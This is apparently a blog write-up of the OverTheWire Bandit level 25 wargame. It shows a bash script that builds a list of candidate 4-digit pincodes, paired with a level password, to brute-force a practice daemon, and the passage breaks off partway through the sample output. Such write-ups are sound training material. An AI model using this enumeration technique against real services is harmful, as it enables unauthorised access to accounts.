Over the Wire - Bandit 25

Bandit 25

Objectives

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Solution

A bit frustrated with this one. I spent way too long on this because my connection to the daemon would time out. I was only getting to around try 7000, and of course the correct port was beyond that.

First I generate a pass list to throw at netcat. I've started with just 8000 - 9999:

    #!/bin/bash
    # Value sent ahead of each candidate pincode
    hash=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
    # Redirect the whole loop so pass.txt holds one line per candidate
    for i in {8000..9999}
    do
        echo "$hash $i"
    done > pass.txt

which generates a pass.txt file with lines like this in it:

    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9978
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9979
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9980
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9981
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9982
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9983
    Uo